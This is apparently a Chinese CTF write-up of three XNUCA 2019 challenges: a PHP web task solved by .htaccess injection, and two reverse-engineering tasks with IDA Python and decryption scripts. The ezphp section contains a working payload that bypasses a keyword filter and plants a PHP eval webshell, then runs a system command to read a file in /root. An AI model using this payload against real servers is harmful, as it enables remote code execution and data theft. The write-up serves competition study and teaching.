XNUCA 2019 部分题目 [archived]

2019-08-31

和队友打了 XNUCA 2019，话说这个比赛题目要不要那么难。。。

满眼全是 kernel、windows、虚拟机逃逸。。。

而且记错了比赛时间，浪费半天时间 ORZ

看来还是自己太菜，只出了俩简单的逆向题，其他的实在是不了解呀。。

ezphp(队友做的)

<?php 
    $files = scandir('./');  
    foreach($files as $file) { 
        if(is_file($file)){ 
            if ($file !== "index.php") { 
                unlink($file); 
            } 
        } 
    } 
    include_once("fl3g.php"); 
    if(!isset($_GET['content']) || !isset($_GET['filename'])) { 
        highlight_file(__FILE__); 
        die(); 
    } 
    $content = $_GET['content']; 
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) { 
        echo "Hacker"; 
        die(); 
    } 
    $filename = $_GET['filename']; 
    if(preg_match("/[^a-z\.]/", $filename) == 1) { 
        echo "Hacker"; 
        die(); 
    } 
    $files = scandir('./');  
    foreach($files as $file) { 
        if(is_file($file)){ 
            if ($file !== "index.php") { 
                unlink($file); 
            } 
        } 
    } 
    file_put_contents($filename, $content . "\nJust one chance"); 
?>

文件名只能有小写字母和.,文件内容过滤了一些关键词

首先尝试写入php代码到一个文件中：

filename=a.php&content=<?php phpinfo(); ?>/*，结果发现不解析php

想到写入.htaccess

参考 https://github.com/sektioneins/pcc/wiki/PHP-htaccess-injection-cheat-sheet 中的方法，使index.php文件包含.htaccess本身，执行写入其中的php代码

content:

1 2	php_value auto_append_file .htaccess #<?php phpinfo();

但是过滤了file,可以使用\+换行来绕过

内容的最后还加了一句\nJust one chance，防止出错同样使用\+换行

payload：

1	?filename=.htaccess&content=php_value auto_append_fi\%0ale .htaccess%0a%23<?php phpinfo(); ?>%5C

同理，写入一句话,在/root目录下发现flag

1
2
3

?filename=.htaccess&content=php_value auto_append_fi\%0ale .htaccess%0a%23<?php eval($_POST[cmd]); ?>%5C

cmd=system('cat /root/flag.txt');

Clever Bird

控制台模拟的 Fbird 游戏，程序存在几个反调试点，用 OD 可以直接忽略

IDA 分析代码，在主循环结束之后会进行一系列的浮点数运算，之后将得出的数据和 0x436ae 做比较。

到这里大概有两种解决方案，一是写脚本模拟算法求解，二是使用程序自身代码进行测试。

调试发现参与运算的源数据是 score，并且 score 越大，最终的计算结果越小。

二分法手动测试发现 score 可能的区间在 0x100000 ~ 0x300000 ，进一步测试推算出正确的 score 为 0x200002.

之后每次运行程序手动 patch score 为 0x200002 即可继续下面的逻辑。

接下来要求输入正确的 key，初始化 key 为 1234567890，输入程序之后发现会先剔除前 4 个字节，将后面的字节带入一个循环中，利用上面计算的结果 (0x200002) 对数据进行逐字节验证，手动解密出结果为 010000000000000001

然后取回之前剔除的 4 个字节，带入另一个循环，每次取出随机数的最低一个字节和输入的字节进行逐位异或，并将结果和硬编码的数据进行对比

内部硬编码数据为

00EFF8E0 16 00 00 00 E4 00 00 00 B3 00 00 00 BD 00 00 00 …?..?..?..

取出的随机数依次是 0x4,0xe5,0x91,0xa9

最终计算得到结果为 B1RD

拼接输入程序得到最终 flag

flag{B1RD010000000000000001}

damnV

利用 KVM 构建了虚拟机，查阅资料得知 KVM 类似 VMWARE，仅仅提供虚拟化环境，而真正的代码依旧是用户态传入的。

IDA 分析代码的时候发现了一个 .paylaod 段，和 CSAW 2018 KVM 题目相似。

.payload 段有 4 个handler，作为虚拟机运行的代码。主要函数中通过 ioctl 执行 KVM_RUN 对应的内核代码，参数位于 .data 段中。

通过分析代码发现 .data 段参数具有固定的格式，前 4 个字节组成的 int 数据为 handler 标识，0 代表执行 handler1，1 代表执行 handler2…

紧接着 4 个字节代表从输入读取的字节数量。后跟 handler 的参数，经验证这些参数是用于验证输入是否正确的。

分析 4 个 handler 发现 handler1 是 CRC32 算法，handler2 是斐波那契数列前 n 项和，handler3 是换表的 BASE64 算法，handler4 是循环异或加密，key 是 Bird, Bird, Bird, Bird is the word.

main 函数中会调用 VM 233 次，动态调试发现 .data 段中的参数不断变化，但是每个 handler 的调用次数以及读取用户输入的长度都不变，每一次需要输入 73 字节的数据。

想到的一个思路就是 python 实现 4 个 handler 的解密算法，并用 IDA python 脚本动态提取出所有 .data 数据模拟解密即可。

用于提取数据的 IDA PYTHON 脚本

from idaapi import *

f = open("C:\\Users\\lenovo\\Desktop\\enc.txt", "w")
for i in range(233):
    print("[*] Getting enc %d ..." % i)
    continue_process()
    GetDebuggerEvent(WFNE_SUSP, -1)
    begin = 0x000055F0C0BB9020
    end = 0x000055F0C0BB952F
    s = []
    temp = []
    temp_addr = 0
    flag = 0
    while begin <= end:
        if Dword(begin) == 0:
            flag = 0
            temp_addr = begin
            temp.append(Dword(temp_addr))
            temp_addr += 4
            temp.append(Dword(temp_addr))
            temp_addr += 4
            temp.append(Dword(temp_addr))
        elif Dword(begin) == 1:
            flag = 0
            temp_addr = begin
            temp.append(Dword(temp_addr))
            temp_addr += 4
            temp.append(Dword(temp_addr))
            arg_len = Dword(temp_addr)
            for i in range(arg_len):
                temp_addr += 4
                temp.append(Dword(temp_addr))
        elif Dword(begin) == 2:
            flag = 0
            temp_addr = begin
            temp.append(Dword(temp_addr))
            temp_addr += 4
            temp.append(Dword(temp_addr))
            token = Dword(temp_addr)
            if token % 3 != 0:
                token = ((token + (3 - token % 3)) / 3) * 4
            else:
                token = (token / 3) * 4
            #print(token)
            temp_addr += 4
            for i in range(token):
                temp.append(Byte(temp_addr))
                temp_addr += 4
        elif Dword(begin) == 3:
            flag = 0
            temp_addr = begin
            temp.append(Dword(temp_addr))
            temp_addr += 4
            temp.append(Dword(temp_addr))
            arg_len = Dword(temp_addr)
            temp_addr += 4
            for i in range(arg_len):
                temp.append(Byte(temp_addr))
                temp_addr += 4
        else:
            print("[-] ERROR!")
            exit(0)
        begin += 0x48
        s.append(temp)
        temp = []
        
    f.write(str(s))
    f.write("\n")

实现解密的脚本

#coding:utf-8
import base64
import string
import binascii
from crc32 import *

def fi_sum(n):
    a = 0
    b = 1
    sum = 0
    for i in range(n):
        sum += a
        a, b = b, a + b
    return (sum & 0xffffffff) + 1

def base64decoder(s, t):
    std_table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    temp = s.translate(string.maketrans(t, std_table))
    return base64.b64decode(temp)

def decode4(enc):
    key = r"Bird, Bird, Bird, Bird is the word."
    i = 0
    j = 0
    plain = ""
    enc_len = len(enc)
    while(i < enc_len):
        if j >= 35:
            j = 0
        plain += chr(enc[i] ^ ord(key[j]))
        i += 1
        j += 1
    #print(len(plain))
    return plain

def decode3(enc):
    s = ""
    for i in enc:
        s += chr(i)
    #print(s)
    if(len(s) == 0):
        print("ç©ºå—ç¬¦ä¸²!")
        exit(0)
    t = r"zy0xw1vu2ts3rq4po5nm6lk7ji8hg9fedcba,.ZYXWVUTSRQPONMLKJIHGFEDCBA"
    #print(len(base64decoder(s, t)))
    return base64decoder(s, t)

def decode2(enc):
    total = enc[0]
    #print(total)
    del enc[0]
    #print(enc)
    t = 0
    i = 0
    f1 = 0
    plain = ""
    while t < total:
        f1 = enc[t]
        for c in range(32, 127):
            if fi_sum(c) == f1:
                plain += chr(c)
                break
        t += 1
    return plain
    #return""

def decode1(enc):
    print("[*] Decrypting CRC...")
    i = 0
    f1 = enc[0]
    #print(hex(f1))
    plain = ""
    for x in range(32, 127):
        for y in range(32, 127):
            temp = chr(x) + chr(y)
            crc = CRC32().calc(temp)
            if (crc & 0xffffffff) == f1:
                plain += temp
                break
    #print "CRC32(%s) = 0x%08x" % (arg, crc)
    #print(len(plain))
    return plain

enc = [[1L, 4L, 4106419778L, 30841243L, 3038310242L, 102334155L], [3L, 3L, 54, 73, 11], [0L, 2L, 2211700772L], [1L, 5L, 3524578L, 3831653648L, 3038310242L, 30841243L, 428607904L], [2L, 2L, 50, 118, 119, 61], [2L, 6L, 106, 90, 67, 75, 57, 48, 121, 76], [3L, 2L, 42, 12], [3L, 5L, 98, 11, 27, 22, 72], [2L, 5L, 112, 78, 121, 49, 57, 90, 54, 61], [3L, 2L, 48, 16], [1L, 4L, 3405478146L, 30841243L, 2425370821L, 2348209393L], [2L, 4L, 50, 118, 83, 82, 104, 80, 61, 61], [2L, 6L, 57, 73, 114, 100, 57, 118, 99, 99], [1L, 6L, 2553379266L, 3524578L, 2553379266L, 596597538L, 1445263496L, 3524578L], [1L, 4L, 3405478146L, 1617528055L, 1874176917L, 2425370821L], [1L, 5L, 3524578L, 1617528055L, 679202349L, 3524578L, 2553379266L], [2L, 4L, 56, 118, 54, 100, 57, 80, 61, 61], [1L, 4L, 30841243L, 1874176917L, 2425370821L, 5702887L]]

plain = ""
temp = 0
d1 = 0
d2 = 0
d3 = 0
d4 = 0

sum_ = 0
for x in enc:
    if x[0] == 0:
        d1 += 1
        plain += decode1(x[2:])
    elif x[0] == 1:
        d2 += 1
        plain += decode2(x[1:])
    elif x[0] == 2:
        d3 += 1
        plain += decode3(x[2:])
    elif x[0] == 3:
        d4 += 1
        plain += decode4(x[2:])
    sum_ += x[1]

print("[*] Decode1 called %d times." % d1)
print("[*] Decode2 called %d times." % d2)
print("[*] Decode3 called %d times." % d3)
print("[*] Decode4 called %d times." % d4)
print("[+] Got plain: %s " % plain)
print("[+] Lehgth = %d" % len(plain))
print("\n")


# f = open("./enc.txt", "r")
# t = open("./ans.txt", "w")

# for i in range(233):
#     d1 = 0
#     d2 = 0
#     d3 = 0
#     d4 = 0

#     r1 = 0
#     r2 = 0
#     r3 = 0
#     r4 = 0
#     exec("enc = " + f.readline())
#     #print(enc)
#     plain = ""
#     temp = 0
#     sum_ = 0
#     for x in enc:
#         if x[0] == 0:
#             d1 += 1
#             plain += decode1(x[2:])
#         elif x[0] == 1:
#             d2 += 1
#             plain += decode2(x[1:])
#         elif x[0] == 2:
#             d3 += 1
#             plain += decode3(x[2:])
#         elif x[0] == 3:
#             d4 += 1
#             plain += decode4(x[2:])
#         sum_ += x[1]
    
#     print("[*] Decode1 called %d times." % d1)
#     print("[*] Decode2 called %d times." % d2)
#     print("[*] Decode3 called %d times." % d3)
#     print("[*] Decode4 called %d times." % d4)
#     print("[+] Got plain: %s " % plain)
#     print("[+] Lehgth = %d" % len(plain))
#     print("\n")
#     t.write(plain)
#     t.write("\n")
# f.close()
# t.close()

最终解密出的部分数据

Don't you know about the bird? Everybody knows that the bird is the word!
ord!birdhe whe? EveDon'ryt y birdbodyws thaout the  a know kno is tbout t
he w knowt ybird knohe aord!bout tt the body bird is touryws thaDon'? Eve
t yhe word!bout t knowDon'ou is t? Eve knows thabirdry birdhe abodyt the 
Don'ry birdord! is t? Eve aou knows tha knowbout the wbodybirdhet the t y
 is t aDon'rybout t birdbody knoword!ou? Evebirdhews tha knot the t yhe w
 know? Evebird aoubodyhe w is tt the  knows thabout tord!ryDon't yhe bird
ryt the  bird know aheoubirdws thaord!t y is tDon'bout t? Evehe wbody kno
 birdDon'he wrybout t? Eve aou knobirdt the t yhews thabody knoword! is t
? Evehe knowbout t a birdt the Don' is tord! knoryt ybirdbodyouhe wws tha
bird? Evebout t knowws thahe wt the  birdhet yryDon'ord! knoou is t abody
ord!ws thabird a is t? Evehe wou knowrybout tt yt the  birdDon'hebody kno
 knot the ouDon'he word!rybirdbody knowws tha? Evet y is t a birdbout the
ryws tha? Evet the Don' knobodyhe w birdbirdheou know at ybout t is tord!
 aheord!ws thabirdDon'bout tt yt the  is the w kno? Eve bird knowbodyryou
ws thaord!t yheDon't the bodybout t is t knowourybird kno bird? Evehe w a
bodybirdt yws thaDon'he wryord! is tt the  aou knobout t bird knowhe? Eve
t the he abody kno bird is tws tha? Evehe wryord!Don'bird knowoubout tt y
ord! know? Eve abody is the wDon'heryou knot y birdbirdbout tt the ws tha
 birdord!he? Evet the oubird about tDon't y knowws tha knoryhe wbody is t
oubirdws thabodybout thehe word!Don't y is t bird? Evet the ry know a kno
 knowbout tt the Don'ord!he w? Evebird knobody aout yhe bird is tws thary
 knoord! a knowbout t birdhe wws thaheDon'? Evet the ryt y is tbodyoubird
ws thaoubout tord!t the  is t kno knowhe whebody abirdryDon' birdt y? Eve

将明文写入同一个文件，利用 strace 命令输入程序即可得到 flag。

1	strace -vo log ./damnV < ans.txt

flag{The_Auth0r_was_stark_mad_and_keep_listening_surfin_bird_for_comfort}